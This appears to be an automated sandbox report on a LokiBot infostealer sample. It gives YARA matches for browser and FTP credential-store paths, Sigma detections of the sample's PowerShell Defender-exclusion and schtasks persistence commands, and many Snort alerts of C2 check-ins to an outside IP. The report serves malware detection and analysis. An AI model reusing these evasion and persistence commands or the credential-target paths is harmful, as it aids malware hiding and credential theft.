0.2.gunzipped.exe.259d1b4.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x8b0ce:$f1: FileZilla\recentservers.xml 0x8b10e:$f2: FileZilla\sitemanager.xml 0x8937e:$b2: Mozilla\Firefox\Profiles 0x890e8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x89292:$s4: logins.json 0x8a13c:$s6: wand.dat 0x88bbc:$a1: username_value 0x88bac:$a2: password_value 0x891f7:$a3: encryptedUsername 0x89264:$a3: encryptedUsername 0x8920a:$a4: encryptedPassword 0x89278:$a4: encryptedPassword
Click to see the 45 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", ProcessId: 5684, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WiHDtnb.exe, ParentImage: C:\Users\user\AppData\Roaming\WiHDtnb.exe, ParentProcessId: 3220, ParentProcessName: WiHDtnb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp", ProcessId: 1396, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", ProcessId: 6276, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", ProcessId: 5684, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", ProcessId: 6276, ProcessName: schtasks.exe

Snort Signatures

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:07.152097
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:07.152097
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:28.314689
SID:	2024313
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:42.872387
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:07.139176
SID:	2024318
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:02.984312
SID:	2021641
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:07.139176
SID:	2024313
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:46.390927
SID:	2021641
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:19.154295
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:49.380266
SID:	2025381
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:31.711088
SID:	2021641
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:50.868001
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:32.922641
SID:	2024318
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:28.314689
SID:	2024318
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:32.922641
SID:	2024313
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:02.659962
SID:	2024318
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:44.899678
SID:	2025381
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:58.145128
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:01.257517
SID:	2025381
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:02.659962
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:23.842884
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:13.162928
SID:	2024313
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:47.288202
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:38.899573
SID:	2021641
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:27.158635
SID:	2025381
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:56.772780
SID:	2025381
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:13.162928
SID:	2024318
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:47.288202
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:47.882152
SID:	2024313
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:13.442138
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:20.835118
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:47.882152
SID:	2024318
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:20.835118
SID:	2024318
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:14.663282
SID:	2025381
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:20.757055
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:41.291392
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:41.291392
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:13.442138
SID:	2024318
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:11.616140
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:55.317148
SID:	2024313
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:55.317148
SID:	2024318
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:34.754471
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:34.395592
SID:	2025381
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:41.923839
SID:	2025381
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:53.924913
SID:	2021641
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:10.136681
SID:	2024318
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:28.661125
SID:	2021641
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:30.128575
SID:	2025381
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:58.235959
SID:	2025381
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:40.424546
SID:	2024318
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:54.967221
SID:	2024313
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:59.618244
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:40.424546
SID:	2024313
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:31.393355
SID:	2024318
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:04.154071
SID:	2024313
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:59.618244
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:50.302449
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:31.393355
SID:	2024313
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:54.967221
SID:	2024318
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:10.084965
SID:	2025381
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:04.154071
SID:	2024318
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:19.349314
SID:	2025381
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:10.136681
SID:	2024313
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:51.797146
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:43.385034
SID:	2024313
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:44.338890
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:01.176692
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:22.368817
SID:	2025381
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:17.652364
SID:	2024313
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:51.797146
SID:	2024318
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:08.603347
SID:	2021641
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:59.708947
SID:	2024318
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:22.632421
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:17.652364
SID:	2024318
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:16.164912
SID:	2021641
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:39.820705
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:35.861538
SID:	2024313
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:53.759072
SID:	2025381
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:29.847908
SID:	2025381
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:52.381113
SID:	2024318
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:59.708947
SID:	2024313
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:08.625526
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:35.861538
SID:	2024318
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:44.338890
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:45.817567
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:16.378463
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:43.385034
SID:	2024318
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:52.381113
SID:	2024313
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:59.618244
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:14.912121
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:02.984312
SID:	2024313
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

